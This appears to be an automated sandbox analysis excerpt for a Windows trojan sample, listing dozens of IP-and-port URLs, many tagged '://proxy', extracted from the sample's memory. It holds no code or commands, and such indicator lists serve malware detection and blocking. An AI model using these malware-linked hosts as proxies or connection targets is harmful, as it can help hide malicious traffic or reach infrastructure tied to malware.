                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.78.131.6:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAABD000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.78.138.163:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.78.138.163:5678://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.78.167.38:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.78.167.38:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.78.170.251:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.78.170.251:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB0DB000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.78.43.213:8880
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB0E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.78.43.213:8880://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.98.218.73:57658
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C761E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://112.98.218.73:57658://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.100.209.184:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.100.209.184:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C68A1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C646E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.11.183.142:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6756000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.11.183.142:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.121.240.114:3256
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.121.240.114:3256://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.143.37.82:9002
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.143.37.82:9002://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.160.182.236:19132
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.160.182.236:19132://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.160.203.118:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.160.203.118:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.160.37.152:53281
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.160.37.152:53281://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD07F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C661F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.161.175.177:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C661F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.161.175.177:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7F28000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7FB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.161.59.136:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7FA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.161.59.136:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.176.118.150:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.176.118.150:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8E09000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.176.118.255:7654
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.176.118.255:7654://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.195.224.222:9999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.195.224.222:9999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.203.234.42:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.203.234.42:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8FFB000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C904B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.204.4.142:10800
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8E50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.204.4.142:10800://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.208.119.142:9002
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.208.119.142:9002://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.223.212.167:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.223.212.167:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.223.214.151:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.223.214.151:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C91CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.226.251
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C91CB000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.226.251.10:8118
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C91CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.226.251.10:8118://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC529000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.252.40.144
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC1B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.252.40.144://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC1B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.252.40.144:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C68A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.30.149.76
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C68A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.30.149.76://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.53.29.228:13629
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.53.29.228:13629://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.53.91.10:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.53.91.10:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.86.204.187:44844
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://113.86.204.187:44844://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.103.88.196:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.103.88.196:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.106.134.155:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.106.134.155:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.106.135.102:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.106.135.102:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C81FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.106.135.105:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.106.135.105:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD0E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.106.135.63:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C83C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.106.135.63:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.106.136.163:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.106.136.163:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.106.146.146:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.106.146.146:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.106.146.149:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.106.146.149:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.106.170.162:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.106.170.162:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.106.171.192:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.106.171.192:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.106.172.119:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.106.172.119:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C906D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.129.2.82:8081
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.129.2.82:8081://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.132.202.125:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8ED8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.132.202.125:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.132.243.168:7890
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.132.243.168:7890://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8DC1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.156.77.107:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.156.77.107:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.231.41.87:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.231.41.87:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.231.45.111:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.231.45.111:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6904000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.231.46.115:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.231.46.115:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.231.46.207:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.231.46.207:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.231.82.96:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.231.82.96:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.232.110.168:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.232.110.168:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.232.110.23:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.232.110.23:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8DEA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8DAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.232.110.34:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8DEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.232.110.34:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.236.93.203:15599
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.236.93.203:15599://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.5.196.209:1081
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.5.196.209:1081://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.5.199.219
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.5.199.219://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.5.199.219:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.67.113.118:45064
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.67.113.118:45064://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.67.113.118:45130
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.67.113.118:45130://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.67.113.118:45153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.67.113.118:45153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.67.113.118:45153x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.97.89.244:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.97.89.244:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.97.89.99:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.97.89.99:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.99.14.240:8004
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.99.14.240:8004://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9145000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8F4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.127.107.218:1085
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8F50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.127.107.218:1085://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.127.20.81:1088
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.127.20.81:1088://proxy
